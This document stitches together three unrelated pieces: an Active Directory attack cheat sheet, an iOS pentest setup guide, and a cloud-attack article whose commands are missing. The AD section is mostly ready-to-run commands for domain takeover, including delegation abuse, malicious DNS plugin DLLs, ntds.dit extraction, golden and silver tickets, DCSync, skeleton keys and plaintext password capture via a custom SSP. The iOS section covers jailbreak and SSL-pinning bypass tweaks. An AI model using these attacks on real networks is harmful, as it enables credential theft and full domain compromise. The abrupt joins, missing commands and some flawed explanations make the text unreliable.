$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid

#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'

#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt

#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
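For reference, the SDDL string fed into RawSecurityDescriptor in the steps above is just a format string around the machine account's SID (Python sketch; the SID below is a made-up example):

```python
def rbcd_sddl(computer_sid: str) -> str:
    # Owner: Builtin Administrators (BA); one full-control ACE for the
    # machine account we created -- the same layout PowerView builds.
    return f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{computer_sid})"

sid = "S-1-5-21-1004336348-1177238915-682003330-5000"  # made-up SID
print(rbcd_sddl(sid))
```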
 

Detailed Articles:

❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.

#Command on Rubeus
Rubeus.exe tgtdeleg /nowrap
 

Detailed Article: Rubeus – Now With More Kekeo

DNSAdmins Abuse

WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitrary DLL with the privileges of dns.exe, which runs as SYSTEM. In case the DC serves DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.

  1. Enumerate the members of the DNSAdmins group:
    • PowerView: Get-NetGroupMember -GroupName "DNSAdmins"
    • AD Module: Get-ADGroupMember -Identity DNSAdmins
  2. Once we found a member of this group we need to compromise it (There are many ways).
  3. Then by serving a malicious DLL on an SMB share and configuring the DLL usage, we can escalate our privileges:
  4. #Using dnscmd:
    dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
    
    #Restart the DNS Service:
    sc \\DNSServer stop dns
    sc \\DNSServer start dns
     

Abusing Active Directory-Integrated DNS

Abusing Backup Operators Group

WUT IS DIS ?: If we manage to compromise a user account that is a member of the Backup Operators group, we can abuse its SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.

  1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
  2. #Create a .txt file that will contain the shadow copy process script
    Script ->{
    set context persistent nowriters
    set metadata c:\windows\system32\spool\drivers\color\example.cab
    set verbose on
    begin backup
    add volume c: alias mydrive
    
    create
    
    expose %mydrive% w:
    end backup
    }
    
    #Execute diskshadow with our script as parameter
    diskshadow /s script.txt
     
  3. Next we need to access the shadow copy; we may have the SeBackupPrivilege, but we can't simply copy-paste ntds.dit. We need to mimic backup software and use Win32 API calls to copy it to an accessible folder. For this we are going to use this amazing repo:
  4. #Importing both dlls from the repo using powershell
    Import-Module .\SeBackupPrivilegeCmdLets.dll
    Import-Module .\SeBackupPrivilegeUtils.dll
    
    #Checking if the SeBackupPrivilege is enabled
    Get-SeBackupPrivilege
    
    #If it isn't we enable it
    Set-SeBackupPrivilege
    
    #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
    Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
    
    #Dump the SYSTEM hive
    reg save HKLM\SYSTEM c:\temp\system.hive
     
  5. Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
  6. Use secretsdump.py from impacket and dump the hashes.
  7. Use psexec or another tool of your choice to PTH and get Domain Admin access.

Abusing Exchange

Weaponizing Printer Bug

Abusing ACLs

Abusing IPv6 with mitm6

SID History Abuse

WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the time it is not), we can abuse it to escalate our privileges to Domain Administrator of the forest root domain. This is possible because of the SID History field in a Kerberos TGT, which defines the "extra" security groups and privileges.

Exploitation example:

#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local

#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local

#Create the Enterprise Admins SID
Format: RootDomainSID-519

#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi

#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi

#List the DC of the Root Domain
dir \\dc.root.domain.local\C$

#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
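The `/sids` value used above is pure string arithmetic: Enterprise Admins is always RID 519 appended to the forest root domain SID (Python sketch with a made-up root SID):

```python
def enterprise_admins_sid(root_domain_sid: str) -> str:
    # Enterprise Admins is always RID 519 under the forest root domain SID.
    return f"{root_domain_sid}-519"

root = "S-1-5-21-280534878-1496970234-700767426"  # made-up root domain SID
print(enterprise_admins_sid(root))
```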
 

Detailed Articles:

Exploiting SharePoint

Zerologon

PrintNightmare

Active Directory Certificate Services

Check for Vulnerable Certificate Templates with: Certify

Note: Certify can be executed with Cobalt Strike's execute-assembly command as well

.\Certify.exe find /vulnerable /quiet
 

Make sure the msPKI-Certificate-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value and that the "Authorized Signatures Required" parameter is set to 0.
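A rough triage of those three conditions can be expressed in a few lines. This is a sketch, assuming the ENROLLEE_SUPPLIES_SUBJECT bit value (0x1, per MS-CRTD) and the Client Authentication EKU OID (1.3.6.1.5.5.7.3.2):

```python
# Assumed constants: ENROLLEE_SUPPLIES_SUBJECT bit from MS-CRTD and the
# Client Authentication EKU OID.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CLIENT_AUTH_OID = "1.3.6.1.5.5.7.3.2"

def template_looks_vulnerable(name_flag: int, ra_signatures: int, ekus: list) -> bool:
    """ESC1-style triage: enrollee supplies the subject, no approving
    signatures required, and an EKU allowing client authentication."""
    return (bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
            and ra_signatures == 0
            and CLIENT_AUTH_OID in ekus)

print(template_looks_vulnerable(0x1, 0, [CLIENT_AUTH_OID]))
```

Certify performs the real checks against AD; this only restates the conditions from the paragraph above.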

This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.

Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.

Request the DA's Account Certificate with Certify

.\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machine
 

This should return a valid certificate for the associated DA account.

The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with one gap of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.

Example of cert.pem:

-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
[...]
-----END RSA PRIVATE KEY-----

-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
[...]
-----END CERTIFICATE-----
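The consolidation step can be scripted rather than done by hand (a Python sketch; file names and contents below are placeholders):

```python
import tempfile
from pathlib import Path

def merge_pem(key_path: Path, cert_path: Path, out_path: Path) -> None:
    # One blank line between the key block and the certificate block.
    key = key_path.read_text().rstrip("\n")
    cert = cert_path.read_text().rstrip("\n")
    out_path.write_text(key + "\n\n" + cert + "\n")

# Demo with placeholder contents in a throwaway directory:
d = Path(tempfile.mkdtemp())
(d / "cert.key").write_text("-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----\n")
(d / "cert.crt").write_text("-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----\n")
merge_pem(d / "cert.key", d / "cert.crt", d / "cert.pem")
print((d / "cert.pem").read_text())
```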
 

Utilize openssl to Convert to PKCS #12 Format

The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 

Once the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)

After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account which will then be imported into memory.

.\Rubeus.exe asktgt /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt
 

This should result in a successfully imported ticket, which then enables an attacker to perform various malicious activities under the DA user context, such as performing a DCSync attack.

No PAC

Domain Persistence

Golden Ticket Attack

#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>

#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<HashOfkrbtgtAccount> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
 

DCsync Attack

#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'

#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm

#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm
 

Tip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use

Silver Ticket Attack

Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service:<ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"'
 

SPN List

Skeleton Key Attack

#Exploitation command run as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>

#Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 

DSRM Abuse

WUT IS DIS?: Every DC has a local Administrator account that holds the DSRM password (the Safe Mode recovery password set at promotion). We can dump it and then PTH its NTLM hash to get local Administrator access to the DC!

#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>

#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>

#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose

#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
 

Then just PTH to get local admin access on DC!

Custom SSP

WUT IS DIS?: We can register our own SSP by dropping a custom DLL, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that log on!

From powershell:

#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty  'Security Packages'

#Append mimilib:
$packages += "mimilib"

#Change the new packages name
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages

#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
 

Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log

Cross Forest Attacks

Trust Tickets

WUT IS DIS ?: If we have Domain Admin rights on a domain that has a bidirectional trust relationship with another forest, we can get the trust key and forge our own inter-realm TGT.

⚠️ The access we will have will be limited to what our DA account is configured to have on the other Forest!

  • Using Mimikatz (❗ tickets are in .kirbi format):
  • Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
  • #Dump the trust key
    Invoke-Mimikatz -Command '"lsadump::trust /patch"'
    Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
    
    #Forge an inter-realm TGT using the Golden Ticket attack
    Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:<PathToSaveTheGoldenTicket>"'
     
  • Using Rubeus:
  • .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
     

Abuse MSSQL Servers

  • Enumerate MSSQL Instances: Get-SQLInstanceDomain
  • Check Accessibility as current user:
  • Get-SQLConnectionTestThreaded
    Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
     
  • Gather Information about the instance: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
  • Abusing SQL Database Links:
    WUT IS DIS?: A database link allows a SQL Server to access external resources, such as another SQL Server. If we have two linked SQL Servers, we can execute stored procedures on them. Database links also work across forest trusts!

Check for existing Database Links:

#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance <SPN> -Verbose

#MSSQL Query:
select * from master..sysservers
 

Then we can use queries to enumerate other links from the linked Database:

#Manually:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')

#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose

#Then we can execute commands on the machines where the SQL service runs using xp_cmdshell
#Or if it is disabled, enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
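When crawling more than one hop manually, each extra OPENQUERY layer doubles the single quotes of the inner query. A sketch of that quoting rule (link names below are hypothetical):

```python
def nest_openquery(query: str, link_path) -> str:
    # Wrap one OPENQUERY layer per hop; every layer of nesting doubles
    # the single quotes of the query inside it.
    for link in reversed(link_path):
        query = 'select * from openquery("{}", \'{}\')'.format(
            link, query.replace("'", "''"))
    return query

print(nest_openquery("select * from master..sysservers", ["SQL2", "SQL3"]))
```

Get-SQLServerLinkCrawl automates exactly this expansion across every discovered link.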
 

Query execution:

Get-SQLServerLinkCrawl -Instance <SPN> -Query "exec master..xp_cmdshell 'whoami'"
 

Breaking Forest Trusts

WUT IS DIS?:
TL;DR
If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has unconstrained delegation enabled (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture its TGT, inject it into memory and DCsync to dump its hashes, giving us complete access over the whole forest.

Tools we are going to use:

Exploitation example:

#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$

#Execute the printerbug to trigger the force authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local

#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>

#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
 

Detailed Articles:


https://kishorbalan.medium.com/start-your-first-ios-application-pentest-with-me-part-1-1692311f1902

 

Start your first iOS Application Pentest with me.. (Part- 1)


 

 

1: Installing the required tools and Cydia tweaks

Note:- There are plenty of different tools and methodologies when it comes to iOS pentesting, and I won't be able to explain all of them; only my methodology will be shared here.

 

Prerequisites:

1: A Jailbroken iOS device

 

Setting up the lab and installing basic tools:

1: Hopefully you already have the Frida and Objection tools on your system; if not, install them:

Releases · frida/frida (github.com)

GitHub — sensepost/objection: 📱 objection — runtime mobile exploration

2: iTunes: We know iTunes will help us to work with iOS environments in several ways.

3: 3uTools: This one has a lot of useful features such as Direct SSH connection, Screen mirroring, iOS application installer, etc..

3uTools | The best all-in-one tool for iOS users

4: Cydia Application:- Basically, Cydia is a third-party application installer, similar to the App Store, developed for jailbroken iDevices. If you jailbreak your device with Checkra1n or Uncover, the Cydia app will be installed automatically.

What if Cydia wasn't installed during the jailbreak:

In case of Checkra1n, you can manually install the Cydia from the Checkra1n app.

 

In case of Uncover, you can enable the Reinstall Cydia option from the Uncover app settings and start jailbreaking.

After the jailbreaking process, the Cydia app can be found in the device.

 

Method for installing Tweaks on the Jailbroken iOS device:

1: With the help of Cydia

Step 1: Add the repo URL of the required cydia tweak in the source section

Step 2: After adding the source, you can find the tweak in the search section

Step 3: Select the tweak and install it; respring the device if needed.

2: Direct method:

Installing the Tweaks with their .deb files through the OpenSSH terminal

Step 1: Find the Tweak’s deb file from its source.

Step 2: Copy the file link and SSH to the iOS device as root user

Step 3: Download the deb file using wget

Step 4: Make the file executable with "chmod +x file.deb" and install it using the "dpkg" command

Step 5: That’s it, Now the tweak will be installed on your device

Dependencies:

The following packages should be installed on the device:

  • Cydia Substrate
  • PreferenceLoader

Installing the required Cydia Tweaks:

Tweaks are basically third-party add-ons that can be used to bypass certain restrictions built into the target iOS applications. A lot of tweaks are available, but here I am listing the necessary ones.

A: Filza:

Repo: https://tigisoftware.com/cydia/

Filza is a file manager for exploring directories including root’s directories.

Filza also provides a WebDAV server, so we can access the files from our other local machines.

B: App Sync Unified

Repo: https://cydia.akemi.ai/

The tweak helps to install IPA files which are ad-hoc signed, fakesigned, or unsigned.

C: IPA installer

Repo: http://apt.thebigboss.org/repofiles/cydia/

This one can be used to install/back up IPA files directly on our jailbroken iOS device.

D: OpenSSH

Repo: http://apt.saurik.com/

We know why we need OpenSSH: we can get terminal access to our iOS device with root privileges.

Default root credentials: root / alpine

E: Frida

Repo: https://build.frida.re/

To work with frida tools, a frida server must be installed on our iOS device.

F: Plutil

Repo: https://apt.bingner.com/

This tool can be used to read .plist files (similar to XML files in Android)

G: fsmon

Repo: GitHub — nowsecure/fsmon: monitor filesystem on iOS / OS X / Android / FirefoxOS / Linux

This is a FileSystem Monitor utility that can be used in environments such as Linux, Android and iOS.

 

Tweaks for Bypassing Jailbreak detection:

The following are the most commonly used tweaks for bypassing jailbreak detection.

A: Liberty Lite

Repo: https://ryleyangus.com/repo/

B: A-Bypass

Repo: https://repo.co.kr/

C: HideJB

Repo: http://apt.thebigboss.org/repofiles/cydia/

D: Hestia

Repo: https://havoc.app/

E: iHide

Repo: https://repo.kc57.com/

 

Alternatively, You can use frida scripts to bypass the JB detection

Frida CodeShare

 

Tweaks for Bypassing SSL Pinning:

The following are the most commonly used tweaks for bypassing SSL certificate pinning.

A: SSL Kill Switch

Repo: https://julioverne.github.io/

B: SSLBypass

Repo: SSLBypass/packages at main · evilpenguin/SSLBypass · GitHub

 

Alternatively, You can use frida scripts to bypass the SSL pinning

Frida CodeShare

 

Note:- Most of the Jailbreak Detection Bypass and SSL Bypass tweaks can be found in the device settings after the installation.

 

So that's it guys, we are almost ready to go. We will kickstart our first iOS application pentest in Part 2. If I have missed something in this part, we will cover it in the next one. Stay tuned, happy hacking :)


https://redteamrecipe.com/60-Method-For-Cloud-Attacks/

 

60 Methods For Cloud Attacks(RTC0009)


 

Insecure Interfaces and APIs

   
  1. --write-test: This option tells the script to write a test file. The purpose and content of the test file would depend on the implementation of the cloudhunter.py script.
  2. --open-only: This option specifies that the script should only check for open ports or services on the target URL, which in this case is http://example.com. It indicates that the script will not attempt to perform any other type of scanning or analysis.
  3. http://example.com: This is the target URL that the script will perform the open port check on. In this example, it is set to http://example.com, but in a real scenario, you would typically replace it with the actual URL you want to test.
   

By replacing <domain> with an actual domain name, the command would attempt to retrieve information specific to that domain using the cf enum tool. The details of what kind of information is gathered and how it is presented would depend on the specific implementation of the tool being used.

   
  • ffuf: This is the name of the tool or command being executed.
  • -w /path/to/seclists/Discovery/Web-Content/api.txt: This option specifies the wordlist (-w) to be used for fuzzing. The wordlist file, located at /path/to/seclists/Discovery/Web-Content/api.txt, contains a list of potential input values or payloads that will be tested against the target URL.
  • -u https://example.com/FUZZ: This option defines the target URL (-u) for the fuzzing process. The string FUZZ acts as a placeholder that will be replaced by the values from the wordlist during the fuzzing process. In this case, the target URL is https://example.com/FUZZ, where FUZZ will be substituted with different payloads from the wordlist.
  • -mc all: This option specifies the match condition (-mc) for the responses received from the target server. In this case, all indicates that all responses, regardless of the HTTP status code, will be considered as valid matches.
   

By providing the --bucket parameter followed by a specific value (gwen001-test002), the script will attempt to brute-force the Amazon S3 buckets using that particular value as the target. The script likely includes logic to iterate through different bucket names, trying each one until a valid or accessible bucket is found.
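The iteration logic such a brute-forcer relies on boils down to name permutation. A minimal sketch (the affix list is an assumption for illustration, not the tool's actual wordlist):

```python
def bucket_candidates(base: str) -> list:
    # Combine the base name with common environment affixes, the way a
    # typical S3 brute-forcer expands its target list.
    affixes = ["dev", "test", "prod", "backup", "staging"]
    names = {base}
    for a in affixes:
        names.update({f"{base}-{a}", f"{a}-{base}", f"{base}{a}"})
    return sorted(names)

print(bucket_candidates("gwen001-test002")[:5])
```

Each candidate would then be probed over HTTP/S3 APIs for existence and accessibility.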

Data Breaches

   
  1. fd -t f -e txt . /path/to/data/breaches: This command uses the fd utility to search for files (-t f) with the extension .txt (-e txt) within the directory /path/to/data/breaches. The . is the search pattern (matching anything), and the final argument is the directory to search. The fd command scans for files matching the specified criteria and outputs their paths.
  2. xargs ag -i "keyword": This command takes the output from the previous fd command and passes it as arguments to the ag command. xargs is used to convert the output into arguments. The ag command is a tool used for searching text files. The option -i enables case-insensitive matching, and "keyword" represents the specific keyword being searched for.
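The same pipeline can be reproduced portably in Python if fd/ag aren't available (a sketch; the demo file contents are made up):

```python
import os
import tempfile

def grep_breach_dump(root: str, keyword: str):
    # Walk the tree, keep only .txt files, match lines case-insensitively.
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".txt"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as f:
                for line in f:
                    if keyword.lower() in line.lower():
                        hits.append((path, line.rstrip("\n")))
    return hits

# Demo on a throwaway directory with made-up contents:
root = tempfile.mkdtemp()
with open(os.path.join(root, "dump.txt"), "w") as f:
    f.write("alice@example.com:Password1\nbob@other.org:hunter2\n")
print(grep_breach_dump(root, "EXAMPLE.COM"))
```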

Insufficient Security Configuration

   

The purpose of the command seems to be to perform a takeover attempt on a domain. Domain takeover refers to the act of gaining control over a domain that is no longer actively maintained or properly configured, allowing an attacker to take control of its associated services or resources.

   
  1. fd -t f -e <file_extension> . /path/to/codebase: This command uses the fd utility to search for files (-t f) with a specific file extension (-e <file_extension>) within the directory /path/to/codebase. The . is the search pattern (matching anything), and the final argument is the directory to search. The fd command scans for files matching the specified criteria and outputs their paths.
  2. xargs ag -i -C 3 "(default|weak|unrestricted|security settings)": This command takes the output from the previous fd command and passes it as arguments to the ag command. xargs is used to convert the output into arguments. The ag command is a tool used for searching text files. The -i option enables case-insensitive matching, and -C 3 shows 3 lines of context around each match. The pattern "(default|weak|unrestricted|security settings)" is a regular expression that searches for occurrences of any of the specified keywords within the files.

Insecure Data storage

   

By replacing <bucket_name> with the actual name of the S3 bucket and <object_key> with the key or path to the desired object within the bucket, the command will initiate the download process for that specific object. The downloaded object will typically be saved to the local file system, with the name and location depending on the behavior of the cf s3download tool.

   

By replacing <url> with the actual target URL, the command will initiate a directory scan on that specific URL using the cf dirscan tool. The tool will attempt to enumerate and list directories or paths within the target URL, providing information about the directory structure of the web application or website.

   
  1. gau -subs example.com: This command uses the gau tool to perform a subdomain discovery (-subs) on example.com. It retrieves a list of URLs associated with the specified domain, including subdomains.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the URLs obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. gf unsafe: This command uses the gf tool with the unsafe pattern to search for potential security-related issues in the HTTP responses. The gf tool allows you to filter and extract data based on predefined patterns.
  4. grep -iE "(encryption|access controls|data leakage)": This command uses grep to search for lines that match the specified case-insensitive (-i) extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “encryption,” “access controls,” or “data leakage” within the output obtained from the previous command.
   
  • ccat: This is the name of the tool or command being executed.
  • elasticsearch search: This part of the command indicates that the specific action being performed is a search operation in Elasticsearch.
  • <index>: This is a placeholder for the name of the Elasticsearch index on which the search operation will be performed. The actual index name should be provided in place of <index>.
  • <query>: This is a placeholder for the search query or criteria to be executed against the specified Elasticsearch index. The actual search query should be provided in place of <query>.

Lack of Proper Logging and Monitoring

   
  1. findomain -t example.com: This command uses the findomain tool to perform a subdomain discovery (-t) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. grep -E "(deployment|configuration management)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.
   
  1. findomain -t example.com: This command uses the findomain tool to perform a subdomain discovery (-t) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. nuclei -t ~/nuclei-templates/ -severity high,medium -tags misconfiguration: This command uses the nuclei tool to perform vulnerability scanning or detection on the subdomains obtained from the previous command. The -t option specifies the path to the Nuclei templates directory (~/nuclei-templates/), which contains predefined templates for identifying security issues. The -severity option is used to specify the severity level of vulnerabilities to be detected, in this case, “high” and “medium.” The -tags option is used to filter templates with specific tags, in this case, “misconfiguration.”
   
  1. subfinder -d example.com: This command uses the subfinder tool to perform subdomain enumeration (-d) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. gf misconfig: This command uses the gf tool with the misconfig pattern to search for potential misconfiguration issues in the HTTP responses. The gf tool allows you to filter and extract data based on predefined patterns.
  4. grep -E "(deployment|configuration management)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.
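The keyword-filter stage shared by these pipelines can be sketched offline in Python. The response lines below are fabricated for illustration; the regular expression is the same one passed to grep -E:

```python
import re

# Fabricated sample of lines as httpx/gf might emit them (illustrative only).
lines = [
    "https://ci.example.com [200] Jenkins deployment console",
    "https://www.example.com [200] Welcome page",
    "https://cfg.example.com [200] configuration management portal",
]

# Same pattern as grep -E "(deployment|configuration management)".
pattern = re.compile(r"(deployment|configuration management)")

# Keep only lines where the pattern occurs anywhere, as grep does.
matches = [line for line in lines if pattern.search(line)]
```

Note that grep matches anywhere in the line, hence `search` rather than `match`.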

Inadequate Incident Response and Recovery

   
  1. aws ec2 describe-instances: This command uses the AWS CLI (aws) to retrieve information about EC2 instances by executing the describe-instances API call. It provides details about the instances running in the specified AWS account.
  2. jq -r '.Reservations[].Instances[] | select(.State.Name!="terminated") | select(.State.Name!="shutting-down") | select(.State.Name!="stopping") | select(.State.Name!="stopped") | select(.State.Name!="running")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query filters instances based on their state, excluding instances that are terminated, shutting down, stopping, stopped, or running.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. az vm list --output json: This command uses the Azure CLI (az) to retrieve a list of virtual machines (VMs) by executing the vm list command. The --output json option specifies the output format as JSON.
  2. jq '.[] | select(.powerState != "stopped" and .powerState != "deallocated")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects VMs that have a powerState different from “stopped” and “deallocated”, meaning they are in an active or running state.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. gcloud compute instances list --format json: This command uses the Google Cloud SDK (gcloud) to retrieve a list of compute instances by executing the compute instances list command. The --format json option specifies the output format as JSON.
  2. jq '.[] | select(.status != "TERMINATED") | select(.status != "STOPPING") | select(.status != "SUSPENDED")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects instances that have a status different from “TERMINATED”, “STOPPING”, or “SUSPENDED”, meaning they are in an active or running state.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.
